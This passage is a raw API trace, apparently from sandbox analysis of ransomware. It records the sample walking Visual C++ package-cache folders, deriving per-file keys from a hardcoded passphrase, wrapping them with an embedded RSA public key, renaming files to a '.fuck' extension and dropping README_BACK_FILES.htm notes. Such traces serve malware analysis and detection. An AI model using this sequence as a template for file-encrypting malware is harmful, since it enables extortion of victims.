"c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab.fuck")) returned 0 [0238.073] CryptDestroyHash (hHash=0x2845ea0) returned 1 [0238.073] CryptDestroyKey (hKey=0x28467e0) returned 1 [0238.073] CryptReleaseContext (hProv=0x285a250, dwFlags=0x0) returned 1 [0238.073] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.073] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.074] GetLastError () returned 0x5 [0238.074] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi")) returned 0x20 [0238.074] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi", dwFileAttributes=0x80) returned 0 [0238.074] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.075] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.075] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg", dwFileAttributes=0x2) returned 0 [0238.075] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x285ab58) returned 1 [0238.077] CryptCreateHash (in: hProv=0x285ab58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.077] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.077] CryptHashData (hHash=0x28467e0, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.077] CryptDeriveKey (in: hProv=0x285ab58, Algid=0x6610, hBaseData=0x28467e0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2845ea0) returned 1 [0238.077] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.077] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.077] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x285a140) returned 1 [0238.078] CryptImportPublicKeyInfo (in: hCryptProv=0x285a140, dwCertEncodingType=0x1, pInfo=0x2869388*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28693b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28693c0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27170a8) returned 1 [0238.078] CryptEncrypt (in: hKey=0x27170a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.078] CryptEncrypt (in: hKey=0x27170a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285a1c8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x285a1c8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.078] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285a1c8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.078] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x277e300, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.078] CryptEncrypt (in: hKey=0x2845ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.078] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.078] CloseHandle (hObject=0xffffffff) returned 1 [0238.078] CloseHandle (hObject=0xffffffff) returned 1 [0238.078] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), bFailIfExists=0) returned 0 [0238.078] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi", dwFileAttributes=0x0) returned 0 [0238.079] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.gsg")) returned 0 [0238.079] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.fuck" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.fuck")) returned 0 [0238.079] CryptDestroyHash (hHash=0x28467e0) returned 1 [0238.079] CryptDestroyKey (hKey=0x2845ea0) returned 1 [0238.079] CryptReleaseContext (hProv=0x285ab58, dwFlags=0x0) returned 1 [0238.079] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.079] FindClose (in: hFindFile=0x2845de0 | out: hFindFile=0x2845de0) returned 1 [0238.079] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\readme_back_files.htm")) returned 0xffffffff [0238.079] AreFileApisANSI () returned 1 [0238.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286cb98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 135 [0238.080] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.080] GetLastError () returned 0x5 [0238.080] GetLastError () returned 0x5 [0238.080] FindNextFileA (in: hFindFile=0x2817858, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0238.080] FindClose (in: hFindFile=0x2817858 | out: hFindFile=0x2817858) returned 1 [0238.080] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\readme_back_files.htm")) returned 0xffffffff [0238.080] AreFileApisANSI () returned 1 [0238.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 112 [0238.080] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.080] GetLastError () returned 0x5 [0238.080] GetLastError () returned 0x5 [0238.080] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.080] FindClose (in: hFindFile=0x2817298 | out: hFindFile=0x2817298) returned 1 [0238.081] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\readme_back_files.htm")) returned 0xffffffff [0238.081] AreFileApisANSI () returned 1 [0238.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 103 [0238.081] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.081] GetLastError () returned 0x5 [0238.081] GetLastError () returned 0x5 [0238.081] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.081] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2845de0 [0238.082] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.082] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.082] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2845ea0 [0238.082] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.082] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.082] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28467e0 [0238.082] FindNextFileA (in: hFindFile=0x28467e0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.082] FindNextFileA (in: hFindFile=0x28467e0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.082] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.082] GetLastError () returned 0x5 [0238.082] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab")) returned 0x20 [0238.083] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0238.083] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.084] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.084] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0238.084] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x285a030) returned 1 [0238.086] CryptCreateHash (in: hProv=0x285a030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.086] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.086] CryptHashData (hHash=0x2817858, pbData=0x2eca30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.086] CryptDeriveKey (in: hProv=0x285a030, Algid=0x6610, hBaseData=0x2817858, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28469e0) returned 1 [0238.086] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----t", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.086] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.086] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x285ac68) returned 1 [0238.087] CryptImportPublicKeyInfo (in: hCryptProv=0x285ac68, dwCertEncodingType=0x1, pInfo=0x286a158*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286a188*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286a190*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27eaad0) returned 1 [0238.087] CryptEncrypt (in: hKey=0x27eaad0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.087] CryptEncrypt (in: hKey=0x27eaad0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2859fa8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2859fa8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.087] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2859fa8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.087] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.087] CryptEncrypt (in: hKey=0x28469e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.087] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.087] CloseHandle (hObject=0xffffffff) returned 1 [0238.087] CloseHandle (hObject=0xffffffff) returned 1 [0238.087] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), bFailIfExists=0) returned 0 [0238.088] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", dwFileAttributes=0x0) returned 0 [0238.088] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.gsg")) returned 0 [0238.088] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.fuck" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.fuck")) returned 0 [0238.088] CryptDestroyHash (hHash=0x2817858) returned 1 [0238.088] CryptDestroyKey (hKey=0x28469e0) returned 1 [0238.088] CryptReleaseContext (hProv=0x285a030, dwFlags=0x0) returned 1 [0238.088] FindNextFileA (in: hFindFile=0x28467e0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.088] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.088] GetLastError () returned 0x5 [0238.089] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi")) returned 0x20 [0238.089] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", dwFileAttributes=0x80) returned 0 [0238.090] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.090] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.090] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg", dwFileAttributes=0x2) returned 0 [0238.090] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x285a9c0) returned 1 [0238.092] CryptCreateHash (in: hProv=0x285a9c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.092] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.092] CryptHashData (hHash=0x27eaa10, pbData=0x2eca30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.092] CryptDeriveKey (in: hProv=0x285a9c0, Algid=0x6610, hBaseData=0x27eaa10, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27eab10) returned 1 [0238.092] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----t", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.092] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.092] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x285a250) returned 1 [0238.093] CryptImportPublicKeyInfo (in: hCryptProv=0x285a250, dwCertEncodingType=0x1, 